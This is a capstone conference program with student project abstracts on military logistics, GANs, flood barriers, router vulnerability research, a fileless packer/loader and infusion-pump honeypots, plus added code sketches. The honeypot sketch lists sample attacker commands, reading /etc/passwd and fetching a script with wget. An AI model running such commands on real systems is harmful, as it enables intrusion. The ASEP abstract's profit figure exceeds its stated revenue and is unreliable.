SMDC-20: ANDREW P. SAGE MEMORIAL CAPSTONE DESIGN CONFERENCE 2020
PROGRAM FOR MONDAY, APRIL 27TH


09:00-12:00 Session 1A: Design
Chair:
Edward Huang (George Mason University, United States)
09:00
Jacob Murdock (United States Military Academy, United States)
Jason Agsalud (United States Military Academy, United States)
Thai Wright (United States Military Academy, United States)
Elliott Cliborne (United States Military Academy, United States)
B-Kit Management Paradigm Simulation

ABSTRACT. The United States Army’s rotary-wing fleet must undergo comprehensive modernization of Aircraft Survivability Equipment (ASE) to combat emerging threats from advanced-generation Man-Portable Air Defense Systems (MANPADS). As the Global War on Terror and conflicts in Iraq and Afghanistan matured, belligerents began employing advanced-stage MANPADS in higher volumes, prompting a Joint Urgent Operational Need Statement (JUONS) directed at modernizing ASE affixed to all legacy fleet airframes. The Army’s current modernization paradigm fields new equipment as soon as it becomes available. This subjects units to frequent maintenance periods, thereby increasing aircraft downtime and reducing unit readiness. A proposed ASE Block Modernization Strategy bundles emerging technologies into suites of components, with installation occurring during dedicated blocks of modernization maintenance that reduce redundant maintenance actions. The modernization campaign requires installation of a universal modular interface consisting of internal wiring and infrastructure, known as the A-kit. Once A-kits are installed, individual units become responsible for installing the physical sensors, known as B-kits, prior to deployment to training centers or operational assignments. B-kit management is constrained by production rate, quantity available, costs, and available installation windows. This project aimed to develop an optimal B-kit management strategy that manages these constraints and maximizes Army Aviation readiness while maintaining minimal impact on operational tempo, training cycles, and unit operations. A discrete event simulation was leveraged to identify an optimal B-kit management plan. The model employed “as late as possible” logic to template B-kit installation as close to a deployment start date as possible without interfering with a commander’s desired training schedule. The model simulated a range of B-kit installation scenarios templated on each Combat Aviation Brigade’s existing training schedule and evaluated readiness metrics based upon user inputs pertaining to desired pre-deployment “no-touch” training windows. This provided the Department of the Army Military Operations - Aviation (DAMO-AV), the U.S. Army Forces Command (FORSCOM), the Project Management Office for Aircraft Survivability Equipment (PM-ASE), and unit commanders with optimal B-kit installation timelines, personnel requirements, and B-kit supply requirements to maximize unit readiness. The design team validated readiness outputs through logic tracing of the entity flow diagram to ensure the model incorporated the declared specifications provided by the stakeholders. The design team verified the readiness outputs by comparing model data to actual readiness data recorded from ongoing modernization efforts. The model provided policy makers with the tools necessary to reorient ASE modernization doctrine to meet the personnel staffing, A-kit/B-kit supply, and funding requirements needed to achieve the readiness levels required to combat existing and emerging threats and satisfy the existing JUONS.
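
As an illustration of the “as late as possible” templating logic, the sketch below backs a hypothetical B-kit installation off a deployment date until it clears a no-touch window and a blocked training period; the dates, durations, and single-constraint logic are assumptions, not the discrete event simulation itself.

```python
from datetime import date, timedelta

def latest_install_start(deployment_start: date,
                         no_touch_days: int,
                         install_days: int,
                         training_blocks: list) -> date:
    """Template a B-kit installation as late as possible: the install must
    finish before the commander's pre-deployment "no-touch" window and must
    not overlap any scheduled training block (all inputs are hypothetical)."""
    # Latest finish allowed by the no-touch window, then back off the install time.
    start = deployment_start - timedelta(days=no_touch_days + install_days)
    window = lambda s: (s, s + timedelta(days=install_days))
    # Slide earlier until the install window clears every training block.
    while any(not (window(start)[1] <= t0 or window(start)[0] >= t1)
              for t0, t1 in training_blocks):
        start -= timedelta(days=1)
    return start

# Hypothetical example: deploy 1 Oct, 30-day no-touch window, 14-day install,
# one training rotation blocked out in August.
print(latest_install_start(date(2020, 10, 1), 30, 14,
                           [(date(2020, 8, 10), date(2020, 8, 24))]))
```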

09:30
Andrew Chapin (George Mason University, United States)
Carl Bai (George Mason University, United States)
Mitchell Palmer (George Mason University, United States)
Andre Herrera (George Mason University, United States)
Hunter Rowlette (George Mason University, United States)
Design of a File-less Deployment for Packer/Loader Systems

ABSTRACT. Our project fulfills a request to produce a software toolkit that allows for remote code execution completely in RAM and file transfer via a service running on a remote host. The goal of our stakeholder, Lockheed Martin Corp. (LM), is for our research to identify a unique way to accomplish this task. The following requirements were provided by LM: (1) the toolkit must consist of two separate executables – a “packer” and a “loader”; (2) the “packer” runs locally on Linux, compresses, then encrypts with AES via a user-provided password before sending data to remote hosts; (3) the “loader” runs on a Windows remote host as a service, receives incoming packed data, decrypts/decompresses, and executes any PE files entirely in RAM (i.e. without touching disk). Support for additional loader operating systems was also desired, and we delivered it. A four-part concept of operations was established: (1) a user selects a data block (e.g. an executable file) and sends it to the packer, where it is packed; (2) the packed data is sent over the internet to the remote host; (3) the remote host receives the packed data with the running loader service; (4) the loader decrypts the data block and either runs it in RAM or makes it available on disk. Specifically, a CLI was built for the packer for user interaction, and a heartbeat process for the loader was designed to communicate the uptime and availability of remote hosts to the user. Our toolkit, written in C++, implements the desired objectives of our stakeholder. We utilized libraries such as LibreSSL, filesystem, and miniz to accomplish the objectives. Finally, quality assurance was established through integration and unit tests of the toolkit. The software was then handed over to LM for confirmation and testing in their environment. Alterations were made as requested and the final product was shipped. This paper provides an in-depth analysis of our product and of our research into products and methodologies similar to our solution.
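
The delivered toolkit is C++ (miniz for compression, LibreSSL for AES); as a language-neutral illustration of the packer’s compress-then-encrypt step and its loader-side inverse, here is a hedged Python sketch using zlib, PBKDF2 key derivation, and AES-GCM from the cryptography package. The salt size, nonce handling, and iteration count are assumptions, not the team’s parameters.

```python
import os, zlib, hashlib
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def pack(data: bytes, password: str) -> bytes:
    """Compress, then encrypt with a key derived from a user-provided password.
    Salt and nonce are prepended so the loader can derive the same key."""
    compressed = zlib.compress(data, level=9)
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    nonce = os.urandom(12)
    ciphertext = AESGCM(key).encrypt(nonce, compressed, None)
    return salt + nonce + ciphertext

def unpack(blob: bytes, password: str) -> bytes:
    """Loader-side inverse: derive key, decrypt, decompress (all in memory)."""
    salt, nonce, ciphertext = blob[:16], blob[16:28], blob[28:]
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return zlib.decompress(AESGCM(key).decrypt(nonce, ciphertext, None))

payload = b"example PE bytes"  # placeholder, not a real executable
assert unpack(pack(payload, "hunter2"), "hunter2") == payload
```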

10:00
Arian Amini (George Mason University, United States)
Hamza Abshir (George Mason University, United States)
Sara Elkholy (George Mason University, United States)
Kamilla Quinones Burgos (George Mason University, United States)
Mahmoud Moharrem (George Mason University, United States)
Design of a Tutorial System for the Associate Systems Engineering Professional (ASEP) Exam

ABSTRACT. Hiring Managers at Systems Engineering companies must select engineering candidates who will add value to the organization now and in the future, and avoid costly bad hires. Interviews with Hiring Managers identified that they use Grade Point Average (GPA), work experience (e.g. internships), and skills (e.g. programming languages) to choose candidates for interviews. To reduce their risk, they also use Professional Licenses as a discriminator. For entry-level Systems Engineers, the Associate Systems Engineering Professional (ASEP) certificate offered by INCOSE is the appropriate Professional License. To earn the ASEP certificate, candidates need to pass a 120-question multiple-choice exam. The exam is based on the INCOSE Systems Engineering Handbook, which consists of more than 250 pages with more than 4,000 keywords. A passing grade is 70%. Only 60% of the people taking the exam pass. The exam costs $160.

A tutorial system for students taking the exam is needed to minimize the risk of not passing the exam (ideally, to guarantee passing), to reduce the time needed to study for the exam, and to make studying for the exam an enjoyable experience.

The Concept of Operations for the Tutorial System is to assess a student’s knowledge with a diagnostic quiz, tailor study material based on the diagnostic, and evaluate the student’s performance with assessment quizzes. The diagnostic avoids studying material the student already knows. The tutorial is self-paced and includes repetition to avoid forgetting.

The Tutorial System was implemented in Google Classroom. It includes PDF study guides in the form of “Summarized Contents,” tests and quizzes in Google Forms, a question pool, and individual progress data sheets. The Google Classroom learning management system has undergone verification testing and satisfies the mission and design requirements.

A Validation Test of the Tutorial System was conducted. Sixteen Senior System Engineering students were given a Diagnostic Test on each chapter in the Handbook on Mondays. On Wednesdays they were given tailored learning material. The following Wednesday (i.e. 7 days later) they were tested on the material. For Chapters 1, 2, 3, and 4 the mean for the Diagnostic was 52.9%, 55.9%, 44.1%, 61% with a standard deviation of 37.4%, 30.3%, 34.8%, 17%. For Chapters 1, 2, 3, and 4 the mean for the Assessment was 41.2%, 75.3%, 78.3%, 63% with a standard deviation of 50.7%, 19.7%, 14.5%, 13%. A standard t-test with α = 0.05 indicated statistically significant improvement from Diagnostic to Assessment for Chapters 2 and 3. There was no statistically significant improvement from Diagnostic to Assessment for Chapters 1 and 4. Analysis of the data has generated modifications to the experiment, the diagnostic/assessment quizzes and the material that will be used as the Validation Test continues.
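
For illustration, the snippet below reproduces a two-sample t-test from the reported Chapter 2 summary statistics using SciPy; treating the groups as independent with n = 16 each is an assumption of this sketch (the actual study design may have called for a paired test).

```python
from scipy.stats import ttest_ind_from_stats

# Chapter 2 summary statistics reported above (percent scores), n assumed to be 16.
t, p = ttest_ind_from_stats(mean1=55.9, std1=30.3, nobs1=16,   # Diagnostic
                            mean2=75.3, std2=19.7, nobs2=16)   # Assessment
print(f"t = {t:.2f}, p = {p:.3f}, significant at alpha = 0.05: {p < 0.05}")
```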

A 5-year projection with 10% market penetration of an annual market of 2,250 SE students generates cumulative revenue of $675,000. With a non-recurring development and testing cost of $75,205 and recurring maintenance costs of $1,281 per year, the 5-year profit is estimated at $3,293,390. The 5-year ROI is 112.95% and the break-even point is in year 1.

10:30
Twinkle Gera (George Mason University, United States)
Bawer Alissa (George Mason University, United States)
Amir Itayem (George Mason University, United States)
Adalid Helguero (George Mason University, United States)
Mohammad Saad (George Mason University, United States)
Using Generative Adversarial Networks to Produce Synthetic Overhead Imagery

ABSTRACT. The purpose of this project is to improve the process of tagging data used to train machine learning object detection and classification models. This object detection process can be used in the context of tagging data, including keyword tags, to organize data efficiently. Two adversarial networks will be built into a Deep Convolutional Generative Adversarial Network (DCGAN): the Generator and the Discriminator. The Generator Network will produce synthetic images and the Discriminator Network will determine the accuracy of those images. A training model will automate this process at the end of the DCGAN architecture. These synthetic images will provide users with realistic detail of classified areas for gaining knowledge or for future programs. After the DCGAN goes through its process, it will indicate to the user which images are real and which are fake. The stakeholders of this project are our customer and subject matter expert: Tim Parker and Johnathan Brant.

The requirements of this project include creating a Generator Neural Network component that is capable of generating realistic synthetic overhead imagery. During this process, the Discriminator will create components to improve the accuracy of the images produced by the Generator. The Discriminator will be responsible for validating the authenticity of those synthetic images. Together these components will produce realistic synthetic overhead imagery. The DCGAN was designed by removing fully connected layers and implementing other layers, such as convolutional, core, and pooling layers, to make up the Generator and Discriminator using the Keras deep learning library with TensorFlow as the backend. Using mini-batch gradient descent, the Generator model will be trained against the Discriminator to learn how to create synthetic overhead imagery from satellites. A stable DCGAN will have a loss curve for both the Discriminator and Generator that starts high and progressively decreases over each epoch. At the end of each epoch, the system will print the loss of both models to the console. The purpose of this is to monitor the loss and terminate the process if the training becomes unstable. The method of validating the DCGAN is qualitative, since it is judged by whether the images it produces look realistic enough. The end goal is to be able to produce, with a stable DCGAN, synthetic images that are similar to the testing dataset.
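
A minimal sketch of the Generator/Discriminator pair described above, written with the Keras API on a TensorFlow backend; the image size, filter counts, and latent dimension are illustrative assumptions rather than the project’s actual architecture.

```python
import tensorflow as tf
from tensorflow.keras import layers

LATENT_DIM = 100  # assumed latent vector size

def build_generator():
    """Upsample a latent vector into a 64x64x3 synthetic overhead image."""
    return tf.keras.Sequential([
        layers.Dense(8 * 8 * 128, input_shape=(LATENT_DIM,)),
        layers.Reshape((8, 8, 128)),
        layers.Conv2DTranspose(128, 4, strides=2, padding="same"),
        layers.BatchNormalization(),
        layers.LeakyReLU(0.2),
        layers.Conv2DTranspose(64, 4, strides=2, padding="same"),
        layers.BatchNormalization(),
        layers.LeakyReLU(0.2),
        layers.Conv2DTranspose(3, 4, strides=2, padding="same", activation="tanh"),
    ])

def build_discriminator():
    """Convolutional classifier scoring images as real or synthetic."""
    return tf.keras.Sequential([
        layers.Conv2D(64, 4, strides=2, padding="same", input_shape=(64, 64, 3)),
        layers.LeakyReLU(0.2),
        layers.Conv2D(128, 4, strides=2, padding="same"),
        layers.LeakyReLU(0.2),
        layers.Flatten(),
        layers.Dense(1, activation="sigmoid"),
    ])

generator, discriminator = build_generator(), build_discriminator()
discriminator.compile(optimizer="adam", loss="binary_crossentropy")
# During each epoch, alternate discriminator and generator updates on
# mini-batches and print both losses to monitor training stability.
```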


11:00
Adel Youssef (George Mason University (SEOR), United States)
Faris Masri (George Mason University (SEOR), United States)
Lucciana Remy (George Mason University (SEOR), United States)
Murat Gokturk (George Mason University (SEOR), United States)
GMU Dynamic Low Visibility Pneumatic Cofferdam

ABSTRACT. Communities across the United States are experiencing a rise in nuisance flooding events. These flooding events cause financial distress for community members and are expected to increase in frequency by over 200% over the next two decades. Businesses are experiencing an increase in store closures and property damage and are losing consumer visits. Homeowners are experiencing property and asset damage associated with flooding. Communities are experiencing a decline in tourism and are at risk of permanent damage to existing buildings and infrastructure.

There is a need for a more effective solution to protect communities from nuisance flood events. Currently available solutions are expensive, have difficult assembly and deployment processes, are temporary, and occupy a lot of space when not in use. Our group has designed and developed a solution that addresses these issues, is cheaper, and has a higher cost-utility than its competitors. The GMU pneumatic cofferdam system is designed to be permanently built around the perimeter of a location where the desired flood protection is to take place and can be deployed by a single operator. This system would eliminate the storage costs that other alternatives require and provides a sleek, lightweight design that increases ease of use and decreases maintenance costs.

The cofferdam system must be easily deployable by an operator, must be cost-effective, and effectively protect against flooding up to the height of the dam wall. The cofferdam must also serve as a usable and visually appealing space when not deployed. A test facility was designed and constructed to test three different prototype configurations. Upon the successful completion of a conceptual design, the first prototype design was finalized to specified parameters and built. Following the build of the first prototype and test environment, a series of tests were performed to measure strength, deployment, and leakage, starting with structural integrity tests of the test environment. With leaking at the pneumatic airbag boundary as the primary design flaw, two of the configurations were found to have significant bottom sealing problems, which scale with the entire length of the cofferdam. The third prototype design alternative improved flood mitigation testing results. A comparative analysis on different materials was conducted, and a final prototype design was agreed upon. The finalized prototype designs and final report have been sent to George Mason University’s patent office for patent processing. Finally, a business use case has been developed for deploying the GMU pneumatic cofferdam system in a location experiencing frequent flooding events, as well as a trade-off analysis of the final cofferdam system design against market competitors.

09:00-12:00 Session 1B: Device Security
Chair:
Paulo Costa (George Mason University, United States)
09:00
Peyton Edmondson (George Mason University, United States)
Fletcher Davis (George Mason University, United States)
Austin Griffith (George Mason University, United States)
Austin Harlow (George Mason University, United States)
Clifford Krey (George Mason University, United States)
Vulnerability Research Workflow and Finding Zero-Day Vulnerabilities

ABSTRACT. Technology companies rely on the trust of their customers in order to prosper and grow. Devices are expected to perform as intended, be robust against potential attacks, and ensure the privacy of personal information from the manufacturing company. The authors of this paper, under the direction of Lockheed Martin Corporation, developed a methodology for putting this trust to the test, performing vulnerability research on a Huawei HG8245H router. Huawei is one of the largest telecommunications equipment manufacturers in the world, and with that comes an expected reputation of trust. However, this trust is already in question. Because of security issues in the past, Huawei is banned from bidding on United States government contracts. In addition, the U.S. government and U.S. contractors are not allowed to use Huawei devices. To address this concern, a vulnerability research workflow was implemented to perform research, analysis, and testing to find possible vulnerabilities and exploits on the Huawei HG8245H router. This workflow leverages free, open-source software along with hardware devices such as the JTAGulator and Bus Pirate. The intent was to find vulnerabilities that had not been previously disclosed, and five zero-day vulnerabilities were successfully exploited. Examination of the source code of commands and services within the router also revealed evidence of 333 potential buffer overflow vulnerabilities along with poor coding practices. All suspected vulnerabilities were tested and validated with proof-of-concept code and were documented in bug-bounty-style reports. The workflow is designed to be repeatable against similar platforms and with a variety of tools and software -- not just the ones leveraged during this project. In this paper, we outline the vulnerability research workflow along with the methods used to find, confirm, and document each vulnerability.

09:30
Felicia Ip (George Mason University, United States)
De’shauna Downs (George Mason University, United States)
Nick Gould (George Mason University, United States)
Sumeet Ramani (George Mason University, United States)
Weapon Systems Cyber Protection

ABSTRACT. Modern weapon systems, software, and data communication systems are inherently vulnerable to many different attack techniques due to the lack of cybersecurity prioritization. Until recently, cybersecurity has been non-existent or has been used as a “bolt-on” solution. Critical weapon systems have a higher impact if compromised, so it is imperative that these systems are protected. Our stakeholders include United States government contractors, the military, and law enforcement. Our system shall be used to help protect weapon systems from cyber attacks and ensure system resilience. Our project utilizes a Raspberry Pi that transmits sensor data as a representation of a weapon system, allowing us to understand the system architecture and demonstrate how to secure a weapon and its data while using object and facial recognition. In the initial phase of our project, we created a backlog of system tasks and capabilities. Within our backlog, we explicitly categorize our tasks as either process or product, and we focus on perfecting all of the process tasks first. We developed a ConOps to describe our system, from deploying and maintaining the devices through the lifecycle of the weapon system, from the viewpoint of an individual who will be using the system. Our sponsor, Northrop Grumman, has required us to maintain a backlog of system tasks, capabilities, architectural diagrams, and key system information, as well as to complete new tasks in sprints. During this phase, we determined the best approach for our system through research of the different components, such as the hardware and software requirements. We then outline the approach to creating a small-form-factor, low-power, environmentally resilient network protection device. Our system uses two Raspberry Pis, represented by an AWS EC2 instance and a physical development lab, serving as the in-flight platform and the ground station. The ground Pi is configured and maintained while the software from the development labs flows onto the Pi, or “weapon system,” once it is “deployed”. The in-flight Pi produces the data and sends it back to the development labs to be further analyzed by AWS Rekognition. Based on the data, an action will trigger upon the existence of particular factors or objects. Throughout the design of our solution, we verified our work by ensuring that we followed cybersecurity best practices, such as identity and access management, secure coding practices, and security configurations on our device and platform. We also ensured that our customer’s expected deliverables were met. In order to validate that our solution meets requirements, it is necessary to demo points of entry by conducting vulnerability assessments and penetration testing against our resilient system.
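
A hedged sketch of the analysis step: sending one frame from the in-flight Pi to AWS Rekognition’s detect_labels call and triggering an action when an object of interest appears. The label, thresholds, and triggered action are hypothetical placeholders, not the project’s configuration.

```python
import boto3

rekognition = boto3.client("rekognition", region_name="us-east-1")  # assumed region

def trigger_action():
    """Placeholder for whatever action the system takes on detection."""
    print("Label of interest detected -- alerting ground station")

def analyze_frame(image_bytes: bytes, label_of_interest: str = "Person") -> bool:
    """Send one sensor frame to AWS Rekognition and report whether the
    hypothetical label of interest was detected with high confidence."""
    response = rekognition.detect_labels(
        Image={"Bytes": image_bytes}, MaxLabels=10, MinConfidence=80
    )
    detected = any(label["Name"] == label_of_interest for label in response["Labels"])
    if detected:
        trigger_action()
    return detected
```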

10:00
Salma Almaz (George Mason University, United States)
Randy Maysaud (George Mason University, United States)
David Nguyen (George Mason University, United States)
Ronan Roque (George Mason University, United States)
Anthony Tate (George Mason University, United States)
Baxter Sigma Spectrum Infusion Pump Honeypot

ABSTRACT. The use of biomedical devices is of paramount importance to the healthcare industry as they help doctors and nurses to better serve their patients. As technology progressed, these devices became much more interconnected with each other to allow a single person to wirelessly manage a fleet of devices through one management terminal. Such devices include infusion pumps, which are used to administer fluids into a patient in a controlled manner. While biomedical device manufacturers have focused on the usability and safety of these devices, they have put little consideration into the cyber and physical security of these systems. Considering that malicious manipulation of biomedical devices can be life threatening, security needs to be one of the main goals of manufacturers. With the increase of threats to healthcare systems and their biomedical devices, it is important to create a way to mitigate these vulnerabilities and eliminate the risk.

One form of defense implemented by various security teams is the honeypot. Honeypots are traps deployed to attract attackers away from legitimate systems. Honeypots can also be configured to log attacker actions in order to inform security personnel of what malicious events are occurring. Our team was tasked by INOVA to create a honeypot for a biomedical device. The device of choice was the Baxter SIGMA Infusion Pump. This infusion pump has many vulnerabilities, such as weak authentication and hardcoded passwords. In order to address these issues and find newer vulnerabilities, we created a virtual honeypot utilizing a Raspberry Pi, a very small computer that can be plugged into a computer monitor or a TV screen. The Raspberry Pi is placed as a server on the network and runs software to deploy the virtual honeypots and the log system. The Raspberry Pi sits on the same network as the Baxter SIGMA Infusion Pump servers. These virtual honeypots are then used to misdirect malicious users into accessing the virtual honeypot instead of the legitimate infusion pump. The Raspberry Pi also has an intrusion detection system (IDS) that can alert the security officers when an attacker has accessed or has attempted to access the virtual honeypots. Once the virtual honeypot is actively running, it should be monitored by a security officer for any intrusions. Each intrusion that is detected will be logged by the virtual honeypot and sent to the Raspberry Pi. The logged information will be stored on the Raspberry Pi and then extracted into a readable file that is sent to the security risk management team for further analysis. The readable file contains the following information to provide explicit details: a timestamp of when the attack occurred; information on the source of a malicious actor’s connection, such as IP addresses or MAC addresses; a log file detailing all input commands entered by the malicious actor; names of files or directories created, modified, or deleted; names of user accounts or group accounts used or accessed during the attack; and, if applicable, a list of any files uploaded or downloaded along with their respective hashes.
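
A sketch of what one such intrusion record might look like as structured data before it is rendered into the readable file; the field names and values are illustrative, not the project’s actual schema.

```python
import json
from datetime import datetime, timezone

# Hypothetical intrusion record capturing the fields enumerated above.
record = {
    "timestamp": datetime.now(timezone.utc).isoformat(),
    "source": {"ip": "203.0.113.42", "mac": "00:1b:44:11:3a:b7"},
    "commands": ["cat /etc/passwd", "wget http://203.0.113.42/tool.sh"],
    "files_changed": {"created": ["/tmp/tool.sh"], "modified": [], "deleted": []},
    "accounts_used": ["root"],
    "transfers": [{"name": "tool.sh", "direction": "upload",
                   "sha256": "0" * 64}],  # placeholder hash value
}
# Rendered into the readable file for the security risk management team.
print(json.dumps(record, indent=2))
```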

The stakeholders of this project are the virtual honeypot development team, the INOVA team, and the attackers. The development team needs to configure a Raspberry Pi to be placed on the INOVA network. The INOVA team will need to ensure that they have an IDS in place prior to placing the Raspberry Pi on their network. By doing so, the INOVA security team will be able to continuously monitor the legitimate infusion pumps on the network, as well as the virtual honeypot. The attackers will be actively sniffing for any vulnerabilities or open ports that seem legitimate. Many attackers are aware of honeypots; therefore, if the honeypot isn't correctly configured to mimic the infusion pump, the attacker will avoid accessing the honeypot and the data gathered will be limited.

In order to verify that the proposed Raspberry Pi and virtual honeypots are fully functional and capable of detecting intrusions, we deploy the virtual honeypots in a closed network and attempt to attack the honeypots using the most common attack techniques seen. We pinged the virtual honeypot, used a brute-force attack technique, and verified that reports were successfully generated. By emulating those attacks from an outside source onto our device, we verified that the Raspberry Pi can deploy the virtual honeypot, detect intrusions, and gather information on the attack carried out against the system. After the completion of the project, the solution will be handed over to INOVA along with documentation such as an installation manual and an operation manual.

10:30
Christopher LaManna (Northrop Grumman, United States)
Sanila Tabassum (Northrop Grumman, United States)
Manav Shah (Northrop Grumman, United States)
Ratan Nambiar (Northrop Grumman, United States)
Weapon Systems Cyber Protection

ABSTRACT. Weapons systems depend not only on hardware but also on software to function effectively and properly. The software capabilities used in various weapons systems are often exposed and vulnerable to different types of attacks. Our approach to this problem is to configure a single-board computer that can protect the system from all different types of attacks. The stakeholder for this project is Northrop Grumman, one of the largest defense contractors in the nation. To describe the concept of operations, the user of the single-board computer should be able to connect the device directly to a system and use the resources provided by the single-board computer to secure the system network. In addition, the device should be operable by a user in a remote location, such as a central command center, as well as by a user controlling the weapons system. The main requirements for this project, as stated by the stakeholder, include developing the system according to industry cybersecurity standards, providing a comparison of our product to those industry cybersecurity standards, using a compact single-board computer in the design, and ensuring that the protection device will fully integrate with any given weapons system. We must also outline how the system will be resilient to a variety of attacks from adversaries as well as cyber incidents, and we must consider network limitations and environmental challenges in the design. In designing the device, we chose to use the Raspberry Pi as the single-board computer. We are configuring it with a virtual private network, firewall, intrusion detection system, and a Linux operating system. All software used in the design is open source. The selected hardware limits our choice of software due to hardware and software compatibility issues. In order to implement the project, the single-board computer will be attached to a test network that simulates a weapons system network. To verify and validate that the system works, we will perform penetration tests against the device on the test network. Additionally, we will conduct network analysis and ensure compliance with the NIST Cybersecurity Framework, NIST 800-160, and other applicable standards. Lastly, our business plan for this project is for Northrop Grumman to acquire our product and implement it in their existing solutions.

11:00
Rahma Moalin Mohamed (George Mason University, United States)
Prayatna Timalsina (George Mason University, United States)
Mattias Duffy (George Mason University, United States)
Connection Resilient Bodycam with Built-In Non-Repudiation and Verification Features

ABSTRACT. Police body-worn cameras (BWCs) have been an important addition to the police toolkit and have been shown to resolve cases faster, reduce paperwork, and make citizens feel safer. Despite these benefits, body camera technology is quite outdated: only one copy of the footage exists, and the officer chooses what to record and what to submit for evidence. This evidence could either be destroyed before submission by an attacker or never recorded in the first place by a negligent officer. In order to ensure the validity and integrity of video and to provide non-repudiation of an officer's actions, we propose a solution that provides these services using just a smartphone.

09:00-12:00 Session 1C: Healthcare
Chair:
Andy Loerch (George Mason University, United States)
09:00
Trevor Parker (United States Military Academy, United States)
Taylor Andrews (United States Military Academy, United States)
James Dorko (United States Military Academy, United States)
Rex Scott (United States Military Academy, United States)
David Hughes (United States Military Academy, United States)
Evaluating the Impact of Soldier Load on Mobility, Lethality, and Survivability

ABSTRACT. Today’s Army requires physically fit Soldiers that are mobile, lethal, and survivable. However, as technology continues to advance, the Army attempts to increase soldiers’ capabilities with additional equipment. These additional capabilities come at the cost of additional weight, which we believe makes the soldier less mobile and therefore less effective in terms of lethality and survivability. Our research attempts to quantify this trade space between mobility, lethality, and survivability. Our research is comprised of three efforts: quantifying mobility, measuring the impact of load on mobility and lethality, and simulating mobility’s effect on the survivability of a soldier. For the first effort, quantifying mobility, we use West Point’s Indoor Obstacle Course Test (IOCT) as a proxy for mobility because it simulates many movements that would be expected of a soldier in combat such as a low crawl, jumping over small walls, climbing over high walls, crossing a balance beam, and jumping through a window. We then look at data available in the Army such as the Army Physical Fitness Test (APFT) and the new Army Combat Fitness Test (ACFT) to create a linear regression model that predicts a soldier’s mobility. Second, our research analyzes mobility and lethality through a controlled experiment where participants negotiate a mobility course followed by a shooting test on a simulated range. This controlled study sent 42 voluntary participants through an obstacle course: once without additional weight, and once with approximately 35% of the participant’s body weight in additional load. Surprisingly, the additional load had no significant effect on either the number of targets hit or the precision of the soldier’s shot group. However, there is data to support that loaded soldiers took longer to engage their target, which could indicate a squad of heavily loaded soldiers would be less lethal and survivable. The study also helped quantify the decrease in mobility of soldiers. Soldiers under load, on average, took twice as long to navigate the first four obstacles and took 60% longer to complete the entire mobility course. This decrease in mobility leaves them exposed to enemy fire for longer periods of time when moving to different forms of cover. Finally, we use mobility scores from our controlled study to model the tradeoff between mobility and survivability via the Infantry Warrior Simulation (IWARS). IWARS helps explore how different sets of protective armor affect the overall mobility speed and likelihood of survival, for a squad-sized infantry element using stochastic modeling. We develop two IWARS scenarios: one in an urban terrain setting and one in an open terrain setting. We then run four different squad configurations with varying levels of mobility and protection in order to see the effect mobility has on survivability. Overall, our research helps quantify mobility through linear regression models, analyzes the effect of increased load on a soldier’s lethality and mobility through a controlled study, and simulates the effect of decreased mobility on a soldier’s survivability using IWARS.
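
A hedged sketch of the first effort, fitting an ordinary least squares model that predicts IOCT time (the mobility proxy) from fitness-test events; the predictors and the synthetic data are placeholders standing in for the Army APFT/ACFT records used in the actual study.

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic stand-ins for ACFT events (deadlift lbs, sprint-drag-carry s, 2-mile-run s).
X = np.column_stack([rng.normal(300, 40, 200),
                     rng.normal(105, 10, 200),
                     rng.normal(840, 60, 200)])
# Fabricated relationship for illustration only: IOCT time in seconds.
ioct_seconds = (180 - 0.05 * X[:, 0] + 0.4 * X[:, 1] + 0.08 * X[:, 2]
                + rng.normal(0, 8, 200))

# Ordinary least squares with an intercept column.
A = np.column_stack([np.ones(len(X)), X])
coef, *_ = np.linalg.lstsq(A, ioct_seconds, rcond=None)
print("intercept and coefficients:", np.round(coef, 3))
```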

09:30
Miranda Eveker (George Mason University, United States)
Evan Simon (George Mason University, United States)
Jared Benedict (George Mason University, United States)
Elizabeth McPherson (George Mason University, United States)
Biomedical Honeypot Device

ABSTRACT. For our senior design project, INOVA has requested that we create a biomedical honeypot to collect information for information security analysis. This honeypot device is designed to attract threat actors in order to understand the tactics, techniques, and procedures they use when attacking the device. The device, once complete, will be placed on the hospital network in a vulnerable state to assist INOVA in collecting the data required to further secure these devices and their network. We are working on the Baxter Sigma Spectrum Infusion Pump, which is currently being used in the hospital. Stakeholders involved in this project include INOVA, the patients who require an infusion pump, and, because these devices connect to the hospital network, all other devices and people being treated in the hospital.

Our concept of operations is the following four-step process: (1) an INOVA IT employee obtains the device and sets it up on the guest network; (2) an attacker connects to the guest network and sees the “biomedical device” vulnerable on the network; (3) the attacker gets into the device and starts collecting or modifying data, altering logs and device functionality, possibly moving elsewhere on the network, etc.; (4) an INOVA cyber employee either monitors the device throughout the day or checks the logs regularly to see how the attackers acquired access, what data they accessed, and any actions they performed.

For the requirements, we have a total of six: the group shall provide the customer (1) organization charts and qualifications; (2) a work breakdown structure; (3) a project schedule; (4) project cost; (5) a weekly projected applied-hours graph and estimated non-labor cost; and (6) a honeypot to monitor attack methods.

Our current design of this honeypot device consists of two virtual machines (VMs) linked together: the first is the honeypot itself, mimicking the infusion pump, and the second is a logging server that monitors the honeypot and collects the required data. Our alternative design was to implement both of these virtual machines on Raspberry Pis, but because of operating system constraints we were unable to move forward with that. Implementation simply consists of setting up these virtual machines on the hospital’s network. To verify that this works, we run our attacking script on the device and observe how the logging VM collects that data and alerts the INOVA employees. For the validation test, we assume that, because the device is as vulnerable as possible, the “attacker” can already be inside the machine. This means that the script run on the device is a valid test to show that the logging server collects the data and alerts INOVA as required. Due to the nature of this project, we have no further business plans once this is complete.

10:00
Carlie Bolling (University of Pennsylvania Student, United States)
Chris Foley (University of Pennsylvania Student, United States)
David Guardiola (University of Pennsylvania Student, United States)
Gabriel Smith (University of Pennsylvania Student, United States)
Katrina Pham (University of Pennsylvania Student, United States)
Ver Corrective Software for Strabismus Treatment

ABSTRACT. Affecting 4% of the U.S. population, strabismus, commonly known as crossed eyes, results in blurry vision, double vision, eye strain, headaches, and a loss of binocular vision. In severe cases, or left untreated, strabismus can transition to ‘lazy eye’, which is the brain’s adaptation of ignoring signals from the affected eye. Current treatments include eye patch therapy and surgery, which can be painful, impose financial burden, and fall short of effectively treating the condition (Birch, 2012).

